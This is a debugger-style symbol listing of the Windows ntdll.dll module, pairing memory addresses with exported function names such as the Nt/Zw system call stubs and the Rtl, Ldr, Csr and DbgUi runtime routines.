77f5c1e8 ntdll!ZwSetEvent
77f5c1e8 ntdll!NtSetEvent
77f5c1f8 ntdll!ZwSetEventBoostPriority
77f5c1f8 ntdll!NtSetEventBoostPriority
77f5c208 ntdll!NtSetHighEventPair
77f5c208 ntdll!ZwSetHighEventPair
77f5c218 ntdll!NtSetHighWaitLowEventPair
77f5c218 ntdll!ZwSetHighWaitLowEventPair
77f5c228 ntdll!NtSetInformationDebugObject
77f5c228 ntdll!ZwSetInformationDebugObject
77f5c238 ntdll!NtSetInformationFile
77f5c238 ntdll!ZwSetInformationFile
77f5c248 ntdll!NtSetInformationJobObject
77f5c248 ntdll!ZwSetInformationJobObject
77f5c258 ntdll!NtSetInformationKey
77f5c258 ntdll!ZwSetInformationKey
77f5c268 ntdll!NtSetInformationObject
77f5c268 ntdll!ZwSetInformationObject
77f5c278 ntdll!ZwSetInformationProcess
77f5c278 ntdll!NtSetInformationProcess
77f5c288 ntdll!NtSetInformationThread
77f5c288 ntdll!ZwSetInformationThread
77f5c298 ntdll!ZwSetInformationToken
77f5c298 ntdll!NtSetInformationToken
77f5c2a8 ntdll!ZwSetIntervalProfile
77f5c2a8 ntdll!NtSetIntervalProfile
77f5c2b8 ntdll!ZwSetIoCompletion
77f5c2b8 ntdll!NtSetIoCompletion
77f5c2c8 ntdll!ZwSetLdtEntries
77f5c2c8 ntdll!NtSetLdtEntries
77f5c2d8 ntdll!NtSetLowEventPair
77f5c2d8 ntdll!ZwSetLowEventPair
77f5c2e8 ntdll!NtSetLowWaitHighEventPair
77f5c2e8 ntdll!ZwSetLowWaitHighEventPair
77f5c2f8 ntdll!ZwSetQuotaInformationFile
77f5c2f8 ntdll!NtSetQuotaInformationFile
77f5c308 ntdll!ZwSetSecurityObject
77f5c308 ntdll!NtSetSecurityObject
77f5c318 ntdll!ZwSetSystemEnvironmentValue
77f5c318 ntdll!NtSetSystemEnvironmentValue
77f5c328 ntdll!ZwSetSystemEnvironmentValueEx
77f5c328 ntdll!NtSetSystemEnvironmentValueEx
77f5c338 ntdll!ZwSetSystemInformation
77f5c338 ntdll!NtSetSystemInformation
77f5c348 ntdll!NtSetSystemPowerState
77f5c348 ntdll!ZwSetSystemPowerState
77f5c358 ntdll!NtSetSystemTime
77f5c358 ntdll!ZwSetSystemTime
77f5c368 ntdll!ZwSetThreadExecutionState
77f5c368 ntdll!NtSetThreadExecutionState
77f5c378 ntdll!ZwSetTimer
77f5c378 ntdll!NtSetTimer
77f5c388 ntdll!ZwSetTimerResolution
77f5c388 ntdll!NtSetTimerResolution
77f5c398 ntdll!NtSetUuidSeed
77f5c398 ntdll!ZwSetUuidSeed
77f5c3a8 ntdll!ZwSetValueKey
77f5c3a8 ntdll!NtSetValueKey
77f5c3b8 ntdll!ZwSetVolumeInformationFile
77f5c3b8 ntdll!NtSetVolumeInformationFile
77f5c3c8 ntdll!ZwShutdownSystem
77f5c3c8 ntdll!NtShutdownSystem
77f5c3d8 ntdll!ZwSignalAndWaitForSingleObject
77f5c3d8 ntdll!NtSignalAndWaitForSingleObject
77f5c3e8 ntdll!ZwStartProfile
77f5c3e8 ntdll!NtStartProfile
77f5c3f8 ntdll!NtStopProfile
77f5c3f8 ntdll!ZwStopProfile
77f5c408 ntdll!NtSuspendProcess
77f5c408 ntdll!ZwSuspendProcess
77f5c418 ntdll!NtSuspendThread
77f5c418 ntdll!ZwSuspendThread
77f5c428 ntdll!ZwSystemDebugControl
77f5c428 ntdll!NtSystemDebugControl
77f5c438 ntdll!ZwTerminateJobObject
77f5c438 ntdll!NtTerminateJobObject
77f5c448 ntdll!NtTerminateProcess
77f5c448 ntdll!ZwTerminateProcess
77f5c458 ntdll!ZwTerminateThread
77f5c458 ntdll!NtTerminateThread
77f5c468 ntdll!NtTestAlert
77f5c468 ntdll!ZwTestAlert
77f5c478 ntdll!NtTraceEvent
77f5c478 ntdll!ZwTraceEvent
77f5c488 ntdll!NtTranslateFilePath
77f5c488 ntdll!ZwTranslateFilePath
77f5c498 ntdll!NtUnloadDriver
77f5c498 ntdll!ZwUnloadDriver
77f5c4a8 ntdll!NtUnloadKey
77f5c4a8 ntdll!ZwUnloadKey
77f5c4b8 ntdll!ZwUnloadKeyEx
77f5c4b8 ntdll!NtUnloadKeyEx
77f5c4c8 ntdll!ZwUnlockFile
77f5c4c8 ntdll!NtUnlockFile
77f5c4d8 ntdll!NtUnlockVirtualMemory
77f5c4d8 ntdll!ZwUnlockVirtualMemory
77f5c4e8 ntdll!NtUnmapViewOfSection
77f5c4e8 ntdll!ZwUnmapViewOfSection
77f5c4f8 ntdll!NtVdmControl
77f5c4f8 ntdll!ZwVdmControl
77f5c508 ntdll!NtWaitForDebugEvent
77f5c508 ntdll!ZwWaitForDebugEvent
77f5c518 ntdll!ZwWaitForMultipleObjects
77f5c518 ntdll!NtWaitForMultipleObjects
77f5c528 ntdll!ZwWaitForSingleObject
77f5c528 ntdll!NtWaitForSingleObject
77f5c538 ntdll!ZwWaitHighEventPair
77f5c538 ntdll!NtWaitHighEventPair
77f5c548 ntdll!NtWaitLowEventPair
77f5c548 ntdll!ZwWaitLowEventPair
77f5c558 ntdll!ZwWriteFile
77f5c558 ntdll!NtWriteFile
77f5c568 ntdll!NtWriteFileGather
77f5c568 ntdll!ZwWriteFileGather
77f5c578 ntdll!NtWriteRequestData
77f5c578 ntdll!ZwWriteRequestData
77f5c588 ntdll!NtWriteVirtualMemory
77f5c588 ntdll!ZwWriteVirtualMemory
77f5c598 ntdll!NtYieldExecution
77f5c598 ntdll!ZwYieldExecution
77f5c5a8 ntdll!NtCreateKeyedEvent
77f5c5a8 ntdll!ZwCreateKeyedEvent
77f5c5b8 ntdll!ZwOpenKeyedEvent
77f5c5b8 ntdll!NtOpenKeyedEvent
77f5c5c8 ntdll!ZwReleaseKeyedEvent
77f5c5c8 ntdll!NtReleaseKeyedEvent
77f5c5d8 ntdll!ZwWaitForKeyedEvent
77f5c5d8 ntdll!NtWaitForKeyedEvent
77f5c5e8 ntdll!NtQueryPortInformationProcess
77f5c5e8 ntdll!ZwQueryPortInformationProcess
77f5c734 ntdll!RtlpEnsureBufferSize
77f5c7c2 ntdll!RtlMultiAppendUnicodeStringBuffer
77f5c878 ntdll!RtlGetLongestNtPathLength
77f5c8e2 ntdll!RtlGetCurrentDirectory_U
77f5cba2 ntdll!RtlIsDosDeviceName_U
77f5ccb2 ntdll!RtlDoesFileExists_U
77f5cdd6 ntdll!RtlGetLengthWithoutLastFullDosOrNtPathElement
77f5cdec ntdll!RtlAppendPathElement
77f5cf92 ntdll!RtlGetLengthWithoutTrailingPathSeperators
77f5cfe4 ntdll!RtlpApplyLengthFunction
77f5d04c ntdll!RtlNtPathNameToDosPathName
77f5d572 ntdll!RtlGetFullPathName_U
77f5d9b8 ntdll!RtlDosSearchPath_U
77f5db54 ntdll!RtlDosApplyFileIsolationRedirection_Ustr
77f5e3c8 ntdll!RtlDosSearchPath_Ustr
77f5ec1e ntdll!CsrClientConnectToServer
77f5ee10 ntdll!CsrNewThread
77f5ee1c ntdll!CsrIdentifyAlertableThread
77f5ee4e ntdll!CsrSetPriorityClass
77f5ee8a ntdll!CsrClientCallServer
77f5ef76 ntdll!CsrGetProcessId
77f5ef7c ntdll!CsrAllocateCaptureBuffer
77f5efd4 ntdll!CsrFreeCaptureBuffer
77f5efe8 ntdll!CsrAllocateMessagePointer
77f5f02a ntdll!CsrCaptureMessageBuffer
77f5f05e ntdll!CsrCaptureMessageString
77f5f11c ntdll!CsrCaptureMessageMultiUnicodeStringsInPlace
77f5f192 ntdll!CsrCaptureTimeout
77f5f1bc ntdll!CsrProbeForWrite
77f5f202 ntdll!CsrProbeForRead
77f5f230 ntdll!DbgUiConnectToDbg
77f5f27e ntdll!DbgUiGetThreadDebugObject
77f5f28c ntdll!DbgUiSetThreadDebugObject
77f5f2a0 ntdll!DbgUiWaitStateChange
77f5f2be ntdll!DbgUiContinue
77f5f2da ntdll!DbgUiStopDebugging
77f5f2f2 ntdll!DbgUiRemoteBreakin
77f5f334 ntdll!DbgUiIssueRemoteBreakin
77f5f36e ntdll!DbgUiDebugActiveProcess
77f5f3a6 ntdll!DbgUiConvertStateChangeStructure
77f5f5a4 ntdll!RtlPushFrame
77f5f5be ntdll!RtlPopFrame
77f5f5d4 ntdll!RtlGetFrame
77f5f96d ntdll!LdrVerifyImageMatchesChecksum
77f5ffc4 ntdll!LdrQueryProcessModuleInformation
77f6010e ntdll!RtlDllShutdownInProgress
77f60164 ntdll!LdrLockLoaderLock
77f6034e ntdll!LdrUnlockLoaderLock
77f60420 ntdll!LdrEnumerateLoadedModules
77f604e2 ntdll!LdrAddRefDll
77f605a6 ntdll!LdrSetDllManifestProber
77f605b2 ntdll!LdrSetAppCompatDllRedirectionCallback
77f6060c ntdll!RtlIsThreadWithinLoaderCallout
77f60656 ntdll!LdrGetDllHandleEx
77f60a4a ntdll!LdrUnloadDll
77f60f68 ntdll!LdrGetProcedureAddress
77f619aa ntdll!LdrInitShimEngineDynamic
77f61d9a ntdll!LdrQueryImageFileExecutionOptions
77f626c6 ntdll!RtlGetNtVersionNumbers
77f6271b ntdll!LdrShutdownProcess
77f62904 ntdll!LdrShutdownThread
77f689d2 ntdll!RtlComputePrivatizedDllName_U
77f69052 ntdll!RtlFinalReleaseOutOfProcessMemoryStream
77f6906c ntdll!RtlInitMemoryStream
77f69086 ntdll!RtlAddRefMemoryStream
77f6909a ntdll!RtlReleaseMemoryStream
77f690bc ntdll!RtlQueryInterfaceMemoryStream
77f69116 ntdll!RtlReadOutOfProcessMemoryStream
77f69194 ntdll!RtlReadMemoryStream
77f691d2 ntdll!RtlWriteMemoryStream
77f691da ntdll!RtlSeekMemoryStream
77f69236 ntdll!RtlSetMemoryStreamSize
77f6923e ntdll!RtlCopyMemoryStreamTo
77f692ac ntdll!RtlRevertMemoryStream
77f692b4 ntdll!RtlLockMemoryStreamRegion
77f692b4 ntdll!RtlUnlockMemoryStreamRegion
77f692b4 ntdll!RtlCopyOutOfProcessMemoryStreamTo
77f692bc ntdll!RtlStatMemoryStream
77f69328 ntdll!RtlCloneMemoryStream
77f69328 ntdll!RtlCommitMemoryStream
77f69330 ntdll!RtlInitOutOfProcessMemoryStream
77f694d1 ntdll!RtlAcquireResourceShared
77f69655 ntdll!RtlAcquireResourceExclusive
77f697a4 ntdll!RtlReleaseResource
77f69887 ntdll!RtlConvertSharedToExclusive
77f69a04 ntdll!RtlConvertExclusiveToShared
77f69ac5 ntdll!RtlDumpResource
77f69b04 ntdll!RtlEnableEarlyCriticalSectionEventCreation
77f69b60 ntdll!RtlInitializeCriticalSectionAndSpinCount
77f69c86 ntdll!RtlSetCriticalSectionSpinCount
77f69d12 ntdll!RtlDeleteCriticalSection
77f69e43 ntdll!RtlpWaitForCriticalSection
77f6a06e ntdll!RtlpUnWaitCriticalSection
77f6a0f2 ntdll!RtlpNotOwnerCriticalSection
77f6a4b5 ntdll!RtlCheckForOrphanedCriticalSections
77f6a928 ntdll!RtlInitializeResource
77f6aa04 ntdll!RtlDeleteResource
77f6aa32 ntdll!RtlNewSecurityObjectWithMultipleInheritance
77f6aa3c ntdll!RtlNewSecurityObjectEx
77f6aa72 ntdll!RtlNewSecurityObject
77f6aa96 ntdll!RtlSetSecurityObject
77f6aab8 ntdll!RtlSetSecurityObjectEx
77f6aada ntdll!RtlQuerySecurityObject
77f6acd6 ntdll!RtlDeleteSecurityObject
77f6acf4 ntdll!RtlNewInstanceSecurityObject
77f6ad64 ntdll!RtlNewSecurityGrantedAccess
77f6ae7a ntdll!RtlCopySecurityDescriptor
77f6afac ntdll!RtlCreateAndSetSD
77f6b234 ntdll!RtlCreateUserSecurityObject
77f6b2a6 ntdll!RtlConvertToAutoInheritSecurityObject
77f6b2b0 ntdll!RtlDefaultNpAcl
77f6b620 ntdll!RtlConvertUiListToApiList
77f6bb06 ntdll!RtlCreateQueryDebugBuffer
77f6bbe8 ntdll!RtlDestroyQueryDebugBuffer
77f6bcbc ntdll!RtlQueryProcessBackTraceInformation
77f6be88 ntdll!RtlQueryProcessHeapInformation
77f6c340 ntdll!RtlQueryProcessLockInformation
77f6c470 ntdll!RtlQueryProcessDebugInformation
77f6cd42 ntdll!RtlAddVectoredExceptionHandler
77f6cdb4 ntdll!RtlRemoveVectoredExceptionHandler
77f6da9a ntdll!RtlApplicationVerifierStop
77f6efd0 ntdll!RtlQueueApcWow64Thread
77f6f3ea ntdll!RtlCreateActivationContext
77f6f53e ntdll!RtlAddRefActivationContext
77f6f560 ntdll!RtlReleaseActivationContext
77f6f5cc ntdll!RtlZombifyActivationContext
77f6f792 ntdll!RtlActivateActivationContextEx
77f6f99c ntdll!RtlDeactivateActivationContext
77f6fb30 ntdll!RtlActivateActivationContextUnsafeFast
77f6fbf2 ntdll!RtlDeactivateActivationContextUnsafeFast
77f6fcba ntdll!RtlGetActiveActivationContext
77f6fcf2 ntdll!RtlFreeThreadActivationContextStack
77f6fd34 ntdll!RtlIsActivationContextActive
77f6fd5a ntdll!RtlActivateActivationContext
77f70db0 ntdll!RtlFindActivationContextSectionString
77f70f94 ntdll!RtlFindActivationContextSectionGuid
77f729d3 ntdll!RtlQueryInformationActivationContext
77f72d12 ntdll!RtlQueryInformationActiveActivationContext
77f75678 ntdll!RtlComputeImportTableHash
77f75906 ntdll!RtlConvertVariantToProperty
77f75984 ntdll!RtlConvertPropertyToVariant
77f759f9 ntdll!PropertyLengthAsVariant
77f75a52 ntdll!RtlSetUnicodeCallouts
77f75a58 ntdll!DbgBreakPoint
77f75a5c ntdll!DbgUserBreakPoint
77f75a68 ntdll!vDbgPrintExWithPrefix
77f75c1a ntdll!DbgPrintReturnControlC
77f75cde ntdll!DbgPrompt
77f75d1e ntdll!DbgQueryDebugFilterState
77f75d24 ntdll!DbgSetDebugFilterState
77f75d2b ntdll!DbgPrint
77f75d45 ntdll!DbgPrintEx
77f75d63 ntdll!vDbgPrintEx
77f75d80 ntdll!KiUserApcDispatcher
77f75d90 ntdll!KiUserCallbackDispatcher
77f75dac ntdll!KiUserExceptionDispatcher
77f75df8 ntdll!KiRaiseUserExceptionDispatcher
77f75ffe ntdll!LdrFindEntryForAddress
77f766e6 ntdll!LdrDestroyOutOfProcessImage
77f76726 ntdll!LdrCreateOutOfProcessImage
77f7691c ntdll!LdrFindCreateProcessManifest
77f76efa ntdll!LdrAccessOutOfProcessResource
77f76f5e ntdll!LdrEnumResources
77f771a2 ntdll!LdrAlternateResourcesEnabled
77f77a54 ntdll!LdrUnloadAlternateResourceModule
77f77baa ntdll!LdrFlushAlternateResourceModules
77f77c5e ntdll!LdrAccessResource
77f77c76 ntdll!LdrFindResource_U
77f77c90 ntdll!LdrFindResourceEx_U
77f77cac ntdll!LdrFindResourceDirectory_U
77f7821a ntdll!LdrLoadAlternateResourceModule
77f78cd2 ntdll!LdrProcessRelocationBlock
77f78d0e ntdll!RtlMultiByteToUnicodeSize
77f78d5c ntdll!RtlUnicodeToMultiByteSize
77f78da4 ntdll!RtlUpcaseUnicodeToMultiByteN
77f795e8 ntdll!RtlUpcaseUnicodeToOemN
77f79f06 ntdll!RtlCustomCPToUnicodeN
77f7a0e4 ntdll!RtlUnicodeToCustomCPN
77f7a28c ntdll!RtlUpcaseUnicodeToCustomCPN
77f7aaf4 ntdll!RtlResetRtlTranslations
77f7abf2 ntdll!RtlConsoleMultiByteToUnicodeN
77f7b044 ntdll!NtCurrentTeb
77f7b04c ntdll!PfxInitialize
77f7b060 ntdll!PfxRemovePrefix
77f7b286 ntdll!PfxInsertPrefix
77f7b362 ntdll!PfxFindPrefix
77f7b416 ntdll!RtlStartRXact
77f7b466 ntdll!RtlAbortRXact
77f7b4a0 ntdll!RtlAddAttributeActionToRXact
77f7b63c ntdll!RtlAddActionToRXact
77f7b812 ntdll!RtlInitializeRXact
77f7bac6 ntdll!RtlApplyRXact
77f7bb3a ntdll!RtlApplyRXactNoFlush
77f7bc4c ntdll!RtlSelfRelativeToAbsoluteSD2
77f7bcc4 ntdll!RtlSelfRelativeToAbsoluteSD
77f7be18 ntdll!RtlMakeSelfRelativeSD
77f7bf2e ntdll!RtlAbsoluteToSelfRelativeSD
77f7bf50 ntdll!RtlCreateAcl
77f7bf9e ntdll!RtlValidAcl
77f7c1aa ntdll!RtlSetInformationAcl
77f7c1f0 ntdll!RtlGetAce
77f7c256 ntdll!RtlFirstFreeAce
77f7c324 ntdll!RtlQueryInformationAcl
77f7c3aa ntdll!RtlAddAce
77f7c486 ntdll!RtlDeleteAce
77f7c4e6 ntdll!RtlAddCompoundAce
77f7c80a ntdll!RtlAddAccessAllowedAce
77f7c826 ntdll!RtlAddAccessAllowedAceEx
77f7c844 ntdll!RtlAddAccessDeniedAce
77f7c860 ntdll!RtlAddAccessDeniedAceEx
77f7c87e ntdll!RtlAddAuditAccessAce
77f7c8ae ntdll!RtlAddAuditAccessAceEx
77f7c8e0 ntdll!RtlAddAccessAllowedObjectAce
77f7c926 ntdll!RtlAddAccessDeniedObjectAce
77f7c96e ntdll!RtlAddAuditAccessObjectAce
77f7cb24 ntdll!RtlInitializeAtomPackage
77f7cb32 ntdll!RtlCreateAtomTable
77f7cbc4 ntdll!RtlDestroyAtomTable
77f7cc7a ntdll!RtlEmptyAtomTable
77f7ce9a ntdll!RtlAddAtomToAtomTable
77f7d02e ntdll!RtlLookupAtomInAtomTable
77f7d110 ntdll!RtlDeleteAtomFromAtomTable
77f7d1ea ntdll!RtlPinAtomInAtomTable
77f7d28a ntdll!RtlQueryAtomInAtomTable
77f7d422 ntdll!RtlInitializeRangeList
77f7d61e ntdll!RtlFreeRangeList
77f7d65a ntdll!RtlGetFirstRange
77f7d704 ntdll!RtlGetNextRange
77f7d858 ntdll!RtlCopyRangeList
77f7d99c ntdll!RtlFindRange
77f7dd0a ntdll!RtlIsRangeAvailable
77f7df2c ntdll!RtlMergeRangeLists
77f7e006 ntdll!RtlAddRange
77f7e08a ntdll!RtlDeleteRange
77f7e1c2 ntdll!RtlDeleteOwnersRanges
77f7e26c ntdll!RtlInvertRangeList
77f7e35c ntdll!RtlImageNtHeader
77f7e362 ntdll!RtlAddressInSectionTable
77f7e424 ntdll!RtlImageDirectoryEntryToData
77f7e47e ntdll!RtlImageRvaToSection
77f7e4ba ntdll!RtlImageRvaToVa
77f7e50c ntdll!RtlRunEncodeUnicodeString
77f7e580 ntdll!RtlRunDecodeUnicodeString
77f7e5b8 ntdll!RtlEraseUnicodeString
77f7e5ea ntdll!RtlAdjustPrivilege
77f7e68a ntdll!RtlValidSid
77f7e6dc ntdll!RtlEqualPrefixSid
77f7e754 ntdll!RtlLengthRequiredSid
77f7e762 ntdll!RtlAllocateAndInitializeSid
77f7e822 ntdll!RtlInitializeSid
77f7e850 ntdll!RtlFreeSid
77f7e874 ntdll!RtlIdentifierAuthoritySid
77f7e87e ntdll!RtlSubAuthoritySid
77f7e88e ntdll!RtlSubAuthorityCountSid
77f7e896 ntdll!RtlLengthSid
77f7e8a8 ntdll!RtlCopySid
77f7e8d8 ntdll!RtlCopySidAndAttributesArray
77f7e9b2 ntdll!RtlConvertSidToUnicodeString
77f7eb4a ntdll!RtlEqualLuid
77f7eb6a ntdll!RtlCopyLuid
77f7eb80 ntdll!RtlCopyLuidAndAttributesArray
77f7eba8 ntdll!RtlCreateSecurityDescriptor
77f7ebce ntdll!RtlValidSecurityDescriptor
77f7ecac ntdll!RtlLengthSecurityDescriptor
77f7ed58 ntdll!RtlGetControlSecurityDescriptor
77f7ed82 ntdll!RtlSetControlSecurityDescriptor
77f7edba ntdll!RtlSetDaclSecurityDescriptor
77f7ee1a ntdll!RtlGetDaclSecurityDescriptor
77f7ee76 ntdll!RtlSetSaclSecurityDescriptor
77f7eed6 ntdll!RtlGetSaclSecurityDescriptor
77f7ef32 ntdll!RtlSetOwnerSecurityDescriptor
77f7ef7e ntdll!RtlGetOwnerSecurityDescriptor
77f7efbc ntdll!RtlSetGroupSecurityDescriptor
77f7f008 ntdll!RtlGetGroupSecurityDescriptor
77f7f042 ntdll!RtlAreAllAccessesGranted
77f7f056 ntdll!RtlAreAnyAccessesGranted
77f7f064 ntdll!RtlMapGenericMask
77f7f0b4 ntdll!RtlImpersonateSelf
77f7f698 ntdll!RtlValidRelativeSecurityDescriptor
77f7f7d2 ntdll!RtlGetSecurityDescriptorRMControl
77f7f826 ntdll!RtlSetSecurityDescriptorRMControl
77f7f848 ntdll!RtlMapSecurityErrorToNtStatus
77f7f92a ntdll!RtlEqualSid
77f7f95c ntdll!RtlSetAttributesSecurityDescriptor
77f8282e ntdll!RtlInitializeHandleTable
77f8284e ntdll!RtlDestroyHandleTable
77f8287c ntdll!RtlAllocateHandle
77f829a0 ntdll!RtlFreeHandle
77f829d0 ntdll!RtlIsValidHandle
77f829fc ntdll!RtlIsValidIndexHandle
77f82a26 ntdll!RtlZeroHeap
77f8314b ntdll!RtlDestroyHeap
77f83316 ntdll!RtlSizeHeap
77f8552c ntdll!RtlAnsiCharToUnicodeChar
77f85574 ntdll!RtlUpcaseUnicodeString
77f8563e ntdll!RtlDowncaseUnicodeString
77f85708 ntdll!RtlUpcaseUnicodeChar
77f85754 ntdll!RtlDowncaseUnicodeChar
77f857a0 ntdll!RtlxUnicodeStringToOemSize
77f857a0 ntdll!RtlUnicodeStringToAnsiSize
77f857a0 ntdll!RtlUnicodeStringToOemSize
77f857a0 ntdll!RtlxUnicodeStringToAnsiSize
77f857be ntdll!RtlAnsiStringToUnicodeSize
77f857be ntdll!RtlxOemStringToUnicodeSize
77f857be ntdll!RtlxAnsiStringToUnicodeSize
77f857be ntdll!RtlOemStringToUnicodeSize
77f857de ntdll!RtlCompareUnicodeString
77f85924 ntdll!RtlEqualUnicodeString
77f85a34 ntdll!RtlPrefixUnicodeString
77f85b48 ntdll!RtlCopyUnicodeString
77f85ba6 ntdll!RtlAppendUnicodeToString
77f85c18 ntdll!RtlAppendUnicodeStringToString
77f85c7e ntdll!RtlCreateUnicodeString
77f85cca ntdll!RtlIsTextUnicode
77f86062 ntdll!RtlHashUnicodeString
77f86126 ntdll!RtlValidateUnicodeString
77f86184 ntdll!RtlDuplicateUnicodeString
77f86282 ntdll!RtlFindCharInUnicodeString
77f8655e ntdll!RtlUpcaseUnicodeStringToAnsiString
77f86606 ntdll!RtlUpcaseUnicodeStringToOemString
77f866c8 ntdll!RtlUnicodeStringToCountedOemString
77f86796 ntdll!RtlUpcaseUnicodeStringToCountedOemString
77f86864 ntdll!RtlEqualDomainName
77f868ba ntdll!RtlEqualComputerName
77f868c0 ntdll!RtlDnsHostNameToComputerName
77f8695c ntdll!RtlInitUnicodeStringEx
77f869a6 ntdll!RtlCopyString
77f869e8 ntdll!RtlUpperChar
77f86afe ntdll!RtlCompareString
77f86b8a ntdll!RtlEqualString
77f86bfe ntdll!RtlPrefixString
77f86c84 ntdll!RtlCreateUnicodeStringFromAsciiz
77f86cac ntdll!RtlUpperString
77f86cec ntdll!RtlAppendAsciizToString
77f86d40 ntdll!RtlAppendStringToString
77f86d8c ntdll!RtlInitializeBitMap
77f86da0 ntdll!RtlClearAllBits
77f86dc8 ntdll!RtlSetAllBits
77f86de6 ntdll!RtlFindClearBits
77f87046 ntdll!RtlFindSetBits
77f872f0 ntdll!RtlClearBits
77f8736e ntdll!RtlSetBits
77f873ea ntdll!RtlFindClearRuns
77f8762a ntdll!RtlFindLongestRunClear
77f8765a ntdll!RtlNumberOfClearBits
77f876a0 ntdll!RtlNumberOfSetBits
77f876ee ntdll!RtlAreBitsClear
77f8776a ntdll!RtlAreBitsSet
77f877f0 ntdll!RtlFindNextForwardRunClear
77f878d8 ntdll!RtlFindLastBackwardRunClear
77f879a2 ntdll!RtlFindMostSignificantBit
77f87a44 ntdll!RtlFindLeastSignificantBit
77f87ae4 ntdll!RtlFindClearBitsAndSet
77f87b10 ntdll!RtlFindSetBitsAndClear
77f87c17 ntdll!RtlAssert2
77f87d06 ntdll!RtlAssert
77f87fba ntdll!RtlDebugPrintTimes
77f88588 ntdll!RtlCreateTimerQueue
77f887ba ntdll!RtlDeleteTimerQueueEx
77f88896 ntdll!RtlDeleteTimerQueue
77f8894a ntdll!RtlCreateTimer
77f88be4 ntdll!RtlUpdateTimer
77f88cb0 ntdll!RtlDeleteTimer
77f88e3e ntdll!RtlSetTimer
77f88e48 ntdll!RtlCancelTimer
77f88f14 ntdll!RtlWalkFrameChain
77f89058 ntdll!RtlCaptureStackContext
77f89152 ntdll!RtlCaptureStackBackTrace
77f891f0 ntdll!RtlGetCallersAddress
77f89234 ntdll!RtlIntegerToChar
77f8932c ntdll!RtlCharToInteger
77f8944e ntdll!RtlUnicodeStringToInteger
77f896d8 ntdll!RtlIntegerToUnicodeString
77f89724 ntdll!RtlLargeIntegerToChar
77f89a4c ntdll!RtlInt64ToUnicodeString
77f89aa6 ntdll!RtlGetCurrentPeb
77f89ab0 ntdll!RtlSetProcessIsCritical
77f89b0c ntdll!RtlSetThreadIsCritical
77f89b68 ntdll!RtlCheckProcessParameters
77f89cd0 ntdll!RtlExpandEnvironmentStrings_U
77f89e14 ntdll!RtlGetNtGlobalFlags
77f89e42 ntdll!RtlFormatCurrentUserKeyPath
77f89f3a ntdll!RtlOpenCurrentUser
77f8a636 ntdll!RtlQueryRegistryValues
77f8aa0c ntdll!RtlWriteRegistryValue
77f8aa62 ntdll!RtlCheckRegistryKey
77f8aa88 ntdll!RtlCreateRegistryKey
77f8aab4 ntdll!RtlDeleteRegistryValue
77f8ab3e ntdll!RtlQueryTimeZoneInformation
77f8ac60 ntdll!RtlSetTimeZoneInformation
77f8adcb ntdll!RtlProtectHeap
77f8aea8 ntdll!RtlGetUserInfoHeap
77f8afe2 ntdll!RtlSetUserValueHeap
77f8b0b2 ntdll!RtlSetUserFlagsHeap
77f8b1d8 ntdll!RtlQueryTagHeap
77f8b318 ntdll!RtlExtendHeap
77f8b4ee ntdll!RtlGetProcessHeaps
77f8b586 ntdll!RtlEnumProcessHeaps
77f8bed8 ntdll!RtlSetHeapInformation
77f8bf0e ntdll!RtlQueryHeapInformation
77f8bf6a ntdll!RtlCreateTagHeap
77f8c166 ntdll!RtlCompactHeap
77f8c286 ntdll!RtlValidateHeap
77f8c44c ntdll!RtlValidateProcessHeaps
77f8c4f8 ntdll!RtlUsageHeap
77f8ca42 ntdll!RtlWalkHeap
77f8d648 ntdll!RtlReAllocateHeap
77f8e3c6 ntdll!RtlGetCompressionWorkSpaceSize
77f8e40c ntdll!RtlCompressBuffer
77f8e462 ntdll!RtlDecompressBuffer
77f8e4aa ntdll!RtlDecompressFragment
77f8e5c6 ntdll!RtlComputeCrc32
77f8e630 ntdll!RtlLockBootStatusData
77f8e6d2 ntdll!RtlUnlockBootStatusData
77f8e712 ntdll!RtlGetSetBootStatusData
77f8e838 ntdll!RtlCreateBootStatusDataFile
77f8e954 ntdll!RtlCreateEnvironment
77f8ea66 ntdll!RtlDestroyEnvironment
77f8ea8e ntdll!RtlSetCurrentEnvironment
77f8eb36 ntdll!RtlQueryEnvironmentVariable_U
77f8ee5e ntdll!RtlSetEnvironmentVariable
77f8f422 ntdll!RtlDestroyProcessParameters
77f8f442 ntdll!RtlDeNormalizeProcessParams
77f8f6c0 ntdll!RtlCreateUserThread
77f8f7e2 ntdll!RtlExitUserThread
77f8f7fe ntdll!RtlFreeUserThreadStack
77f8f85e ntdll!RtlCreateProcessParameters
77f8fc52 ntdll!RtlCreateUserProcess
77f9040c ntdll!RtlCreateSystemVolumeInformationFolder
77f906bc ntdll!RtlTimeToTimeFields
77f907b4 ntdll!RtlTimeFieldsToTime
77f9094e ntdll!RtlTimeToElapsedTimeFields
77f909ae ntdll!RtlTimeToSecondsSince1980
77f909ee ntdll!RtlSecondsSince1980ToTime
77f90a1c ntdll!RtlTimeToSecondsSince1970
77f90a5c ntdll!RtlSecondsSince1970ToTime
77f90a8a ntdll!RtlSystemTimeToLocalTime
77f90ac0 ntdll!RtlLocalTimeToSystemTime
77f90af6 ntdll!RtlCutoverTimeToSystemTime
77f90cbc ntdll!RtlSplay
77f90e1e ntdll!RtlSubtreeSuccessor
77f90e38 ntdll!RtlSubtreePredecessor
77f90e52 ntdll!RtlRealPredecessor
77f90f64 ntdll!RtlDelete
77f90fd8 ntdll!RtlDeleteNoSplay
77f91050 ntdll!RtlInitializeGenericTable
77f91132 ntdll!RtlIsGenericTableEmpty
77f91140 ntdll!RtlGetElementGenericTable
77f911c0 ntdll!RtlNumberGenericTableElements
77f911ca ntdll!RtlEnumerateGenericTableWithoutSplaying
77f9124c ntdll!RtlInsertElementGenericTable
77f91278 ntdll!RtlDeleteElementGenericTable
77f91304 ntdll!RtlEnumerateGenericTable
77f9134a ntdll!RtlLookupElementGenericTable
77f91536 ntdll!RtlRealSuccessor
77f9159a ntdll!RtlInitializeGenericTableAvl
77f916a2 ntdll!RtlIsGenericTableEmptyAvl
77f916b2 ntdll!RtlGetElementGenericTableAvl
77f9177e ntdll!RtlNumberGenericTableElementsAvl
77f91788 ntdll!RtlEnumerateGenericTableWithoutSplayingAvl
77f9181c ntdll!RtlInsertElementGenericTableAvl
77f91848 ntdll!RtlDeleteElementGenericTableAvl
77f918c6 ntdll!RtlEnumerateGenericTableAvl
77f918e2 ntdll!RtlEnumerateGenericTableLikeADirectory
77f919aa ntdll!RtlLookupElementGenericTableAvl
77f921c4 ntdll!RtlRegisterWait
77f92550 ntdll!RtlDeregisterWaitEx
77f92674 ntdll!RtlDeregisterWait
77f92682 ntdll!RtlFindMessage
77f9274c ntdll!RtlFormatMessage
77f92d44 ntdll!RtlRegisterSecureMemoryCacheCallback
77f92d76 ntdll!RtlFlushSecureMemoryCache
